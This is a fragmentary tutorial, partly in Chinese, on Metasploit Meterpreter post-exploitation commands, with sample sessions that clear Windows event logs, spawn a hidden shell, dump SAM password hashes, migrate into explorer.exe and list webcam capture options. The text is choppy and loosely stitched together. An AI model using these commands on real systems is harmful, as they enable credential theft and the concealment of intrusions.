Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip...
The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.
上面是没有使用clearev命令清除前。
用法:
1 2 3 4 5
meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... meterpreter >
meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
GETUID
返回目标主机的服务器名字:
1 2 3
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
HASHDUMP
dump出Windows上SAM数据库的内容:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes...
Listing: C:\Documents and Settings\victim =========================================
Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip...
MIGRATE
注入到另外一个进程中去:
1 2 3 4 5 6 7 8
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter >
-h: Displays the help information for the command -i opt: If more then 1 web cam is connected, use this option to select the device to capture the image from -p opt: Change path and filename of the image to be saved -q opt: The imagine quality, 50 being the default/medium setting, 100 being best quality -v opt: By default the value is true, which opens the image after capture.